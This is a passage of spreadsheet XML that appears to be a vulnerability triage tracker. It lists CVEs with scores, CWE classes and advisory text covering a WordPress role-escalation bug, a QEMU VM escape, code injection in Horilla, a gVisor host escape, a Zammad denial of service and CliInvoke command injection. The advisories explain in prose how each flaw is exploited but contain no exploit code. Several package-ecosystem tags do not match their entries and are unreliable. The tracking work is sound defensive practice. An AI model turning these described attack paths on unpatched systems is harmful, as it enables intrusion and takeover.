      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>The Knit Pay – Cashfree, Instamojo, Razorpay, PayPal and more plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 9.6.1.0. This is due to the `maybe_update_user_role()` function reading the target role directly from an attacker-controlled Gravity Forms entry field — configured via the feed's `user_role_field_id` — and passing it to `WP_User::set_role()` without validating the supplied value against an allowlist of permitted roles. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to administrator by tampering with the hidden role field value at form submission time. Exploitation is further enabled by the fact that $0 orders are synchronously marked as SUCCESS during form submission without requiring a real payment, and when no GF User Registration user can be resolved, the role assignment target falls back to `$lead['created_by']` — the currently authenticated submitter's own user ID — making any authenticated form submitter an eligible exploitation target.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89426</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93834</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>A use-after-free vulnerability was found in QEMU's 9pfs subsystem. A race condition between the main thread and a worker thread when processing concurrent Tlcreate and Twalk requests allows a malicious guest user to craft a fid path containing stale heap data, bypassing directory traversal restrictions and escaping the shared directory boundary. This can lead to arbitrary host file read/write and code execution (VM escape) as the QEMU process user.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93834</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94445</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>go, golang, rust</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>A malicious txtar could escape the intended execution context and force arbitrary writes to the playground host's trusted filesystem.
Disjointly, one of the three possible paths to invoke go vet on the playground host did not correctly restrict the execution environment. This permitted a Go process to make a read for an environment configuration file rooted in the playground host's $HOME.
Together, a well-crafted go env file and the go vet invocation could lead to remote code execution in the playground host itself.
This does not affect users of go.dev/play directly; however, it may affect independent deployments of golang.org/x/playground.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94445</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96795</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>docker, python</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>Horilla is an HR and CRM software. Prior to 2.0.0, HorillaListView.export_data in horilla_views/generic/cbv/views.py accepts an authenticated user's columns POST parameter, takes field_tuple[1], interpolates it into dynamic_fn_str as Python source, and passes the generated function definition to exec(). A crafted string that remains valid under ast.literal_eval can inject Python syntax into a default argument evaluated during function definition, allowing arbitrary operating-system commands to execute with the application process privileges, including root privileges in the shipped Docker image. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96795</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96812</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@google.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-668</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>Improper Exposure of Resource to Wrong Sphere in the host file helper (gofer) in Google gVisor prior to commit 573a9e73cf844f on Linux platforms with CUSE enabled allows a local attacker with container image deployment privileges to achieve root code execution on the host system. By including a /dev/cuse character device node in a container image, opening the device passes through to the host, allowing the sandboxed attacker to register a host device and exploit CUSE unrestricted ioctl handling to overwrite root udev helper memory.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96812</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97555</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr"/>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix heap overflow in DACL owner/group rewrite
When id_mode_to_cifs_acl rewrites an existing DACL, it allocates a
buffer sized according to the on-disk DACL length reported by
dacl_ptr-&gt;size. However, replace_sids_and_copy_aces may rewrite each
ACE with a new owner/group SID obtained from the cifs.idmap upcall.
Those SIDs can have up to SID_MAX_SUB_AUTHORITIES (15) sub-authorities,
making each ACE up to 76 bytes (sizeof(struct smb_ace)).
If the original DACL contains short SIDs (e.g., 1 sub-authority) while
the replacement SIDs are long, the rewritten ACEs overflow the
allocation.
Fix this by always budgeting for worst-case SID expansion: allocate
sizeof(struct smb_acl) plus num_aces * sizeof(struct smb_ace), which
covers the smb_acl header and room for every ACE at maximum SID size.
This replaces the previous split logic that used dacl_ptr-&gt;size for
cifsacl mounts but num_aces * sizeof(struct smb_ace) for mode_from_sid
mounts: both paths can trigger the same rewrite and need the same
headroom.
KASAN reports this as:
  BUG: KASAN: slab-out-of-bounds in build_sec_desc+0x1e8a/0x2680 [cifs]
  Write of size 4 at addr ffff8881a5e25374 by task chown/5298
  ...
  The buggy address is located 0 bytes to the right of
   allocated 884-byte region [ffff8881a5e25000, ffff8881a5e25374)</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97555</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98115</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>requests, go</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr"/>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: safely drain sessions during logoff
SMB3 multichannel allows requests for one session to run on multiple
connections. Wait for all channels bound to a session before freeing
shared session objects.
A deferred byte-range lock remains counted as a running request and only
wakes when its file closes. Wake blocked locks during the drain without
unpublishing or modifying their file objects. Synchronous CANCEL requests
must invoke their cancellation callback to wake pending operations, while
CHANGE_NOTIFY completion remains specific to the asynchronous path.
Serialize session teardown with channel registration and previous-session
cleanup, and use atomic work-state transitions so LOGOFF, CANCEL, and
connection teardown invoke cancellation callbacks only once.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98115</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56725</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-400</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, summary An unauthenticated request to POST /api/v1/import/otrs/import_check blocks a Zammad request worker for roughly two minutes. The import_check and import_status actions are missing the setup_done_response guard that other actions in the same controller carry, so they execute on fully set-up production instances. The action enters a retry loop against a blank OTRS endpoint, sleeping for 30 s + 45 s between attempts. Impact An unauthenticated remote attacker denies service to a production Zammad instance. Each request costs almost nothing and forces ~115 seconds of server-side blocking. A few requests per second saturate the Puma worker pool. The condition persists as long as the traffic continues. No account, valid import configuration, or target knowledge beyond the hostname is needed. CSRF token is trivially obtained from any prior GET response. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56725</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56733</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2 and 7.1.0, this issue concerns a lack of discursive validation within the authorization cascade. It has been determined that the system-level enforcement of access restrictions during the initialization of new identity objects exhibits a discrepancy: Under specific conditions, the granular restrictions of the access key being used are overridden by the latent authorization authority of the parent account. Consequently, this means that the intended separation of functional areas is nullified, resulting in an uncontrolled expansion of administrative discretion. Due to this potential integrity breach of the entire trust environment, an immediate evaluation of the authorization hierarchies is imperative. Impact An attacker can create new administrator accounts despite token restrictions. This grants full access to all system data (tickets, customers, configuration) and allows the attacker to take complete control of the Zammad instance. Abuse Scenario The vulnerability stems from a lack of synergy between the token-based authorization logic and the target system's functional authorization hierarchy, which allows for iterative escalation of the privileged access context. This issue is fixed in versions 7.0.2 and 7.1.0.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56733</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100368</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>nuget</t>
        </is>
      </c>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr">
        <is>
          <t>nuget:AlastairLundy.CliInvoke.Specializations, nuget:CliInvoke.Specializations</t>
        </is>
      </c>
      <c r="M29" s="5" t="inlineStr">
        <is>
          <t>2.0.2, 2.10.5, 2.8.5, 2.9.4, 3.0.0-beta.1</t>
        </is>
      </c>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>CliInvoke is a .NET library for invoking command-line programs, and its `CliInvoke.Specializations` packages provide specialized wrappers for shells such as PowerShell and Windows Command Prompt. `CliInvoke.Specializations` versions 2.2.0 through 2.8.4, 2.9.0 through 2.9.3, 2.10.0 through 2.10.4, 3.0.0-alpha.1 through 3.0.0-alpha.4, and 3.0.0-alpha.8 through 3.0.0-alpha.10, as well as `AlastairLundy.CliInvoke.Specializations` versions 1.0.0-rc.1 through 1.6.1.1, contain an OS command injection vulnerability in their PowerShell and Cmd wrappers. The wrappers pass a caller-controlled target and arguments to `pwsh -Command` or `cmd /c` using a single `ProcessStartInfo.Arguments` string, allowing a double quote in untrusted input to break operating-system-level quoting and cause the shell to execute an additional command with the host process's privileges. The vulnerability is patched in `CliInvoke.Specializations` versions 2.8.5, 2.9.4, 2.10.5, and 3.0.0-beta.1, and in `AlastairLundy.CliInvoke.Specializations` version 2.0.2. No complete workaround is available; users unable to upgrade should reject or remove double quotes from target paths and arguments, additionally reject shell metacharacters in versions 2.2.0 through 2.9.2 and 3.0.0-alpha.1 through 3.0.0-alpha.4, or bypass the PowerShell and Cmd wrappers and invoke target processes directly when handling untrusted input.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100368</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100369</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>nuget</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr">
        <is>
          <t>nuget:AlastairLundy.CliInvoke, nuget:CliInvoke</t>
        </is>
      </c>
      <c r="M30" s="5" t="inlineStr">
        <is>
          <t>2.0.2, 2.10.5, 2.8.5, 2.9.4, 3.0.0-beta.2</t>
        </is>
      </c>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>CliInvoke and its formerly named `AlastairLundy.CliInvoke` package are .NET libraries for invoking command-line programs and wrapping executable processes. `CliInvoke` versions 2.0.0 through 2.8.4, 2.9.0 through 2.9.3, 2.10.0 through 2.10.4, and 3.0.0-alpha.1 through 3.0.0-beta.1, as well as `AlastairLundy.CliInvoke` versions 2.0.0-alpha.1 through 2.0.0, contain an argument-injection vulnerability in `RunnerProcessFactory` on the 2.x line and `RunnerConfigurationFactory` on the 3.x line. These factories combine runner arguments, a caller-controlled target, and caller-controlled arguments into one `ProcessStartInfo.Arguments` string, allowing a double quote in the target or an argument to terminate an operating-system-level quoted region and inject unintended elements into the runner’s argument vector, potentially resulting in arbitrary command execution when a shell runner is used. The vulnerability is patched in `CliInvoke` versions 2.8.5, 2.9.4, 2.10.5, and 3.0.0-beta.2, and in `AlastairLundy.CliInvoke` version 2.0.2. No complete workaround is available; users unable to upgrade can partially mitigate the issue by removing double quotes from targets and arguments, additionally removing shell metacharacters when using shell runners, or bypassing the vulnerable factory and constructing a `ProcessConfiguration` with an explicit `ArgumentList`.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100369</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100551</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>OpenClaw for iOS versions &gt;= 2026.7.1 and &lt; 2026.8.11 do not enforce saved Gateway TLS pins in the Control UI. While native connections enforced the saved Gateway fingerprint, the authenticated Terminal and session Dashboard WebViews omitted it. If a user had accepted a Gateway fingerprint, an attacker able to redirect the same host and port and present a different certificate that is accepted by iOS system trust can serve a replacement Control UI page; opening the Terminal or a session Dashboard then allows that page to read the injected Gateway token or password. The stolen credential can grant operator access, including reading sensitive Gateway state and invoking host-capable tools. This issue is fixed in 2026.8.11.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100551</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100588</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 does not enforce the administrator scope requirement on browser control when it is reached through the node.invoke method, although direct browser.request access requires administrator scope. In Gateway deployments that honor caller identity and narrower operator scopes, a write-scoped caller with access to a connected browser-capable node can inspect pages, navigate tabs, or interact with browser-visible applications without the configured admin requirement; practical impact depends on the browser profile and signed-in state. Shared-secret token and password callers are considered fully trusted operators under OpenClaw's security model and are not affected. The issue is fixed in 2026.7.1.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100588</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
